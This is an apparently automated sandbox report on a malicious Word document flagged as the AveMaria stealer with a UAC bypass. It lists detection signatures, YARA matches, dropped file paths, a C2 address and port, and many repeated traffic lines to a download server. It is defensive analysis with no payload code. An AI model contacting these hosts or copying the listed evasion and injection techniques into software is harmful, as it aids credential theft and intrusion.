Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID: 708250
MD5: 9bc102ffb0930f5dee65bde8e0ba6d89
SHA1: 37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256: 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags: doc

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connections per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50%
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Joe Sandbox ML: detected
Source: 8.2.explorer.exe.3a2b638.11.unpack Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

Exploits

Source: Yara match File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: explorer[1].exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
